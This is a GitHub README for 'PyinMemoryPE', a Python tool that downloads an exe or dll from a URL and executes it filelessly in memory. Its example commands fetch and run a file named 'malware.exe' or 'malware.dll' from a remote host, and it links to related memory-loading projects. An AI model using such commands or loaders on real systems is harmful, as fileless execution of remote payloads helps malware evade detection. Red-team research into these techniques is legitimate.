Skip to content

Latest commit

 

History

History
32 lines (17 loc) · 621 Bytes

README.md

File metadata and controls

32 lines (17 loc) · 621 Bytes

Greetings

PyinMemoryPE

execute any PE (dll,exe) in memory filelessly

usage

pyMemory.py < url> < TYPe >

build into exe

use pyinstaller or nuitka and build pymemory.py

or use the prebuilt exe in ./output

example

exe : PyexecMemory.exe http://example.com/malware.exe EXE

dll: PyexecMemory.exe http://example.com/malware.dll DLL --Method DLLRegisterServer

#video demo :(by gemini cyber security)

https://youtu.be/51dctDdCiI0?feature=shared

Check for more info and resources

https://github.com/naksyn/PythonMemoryModule

https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/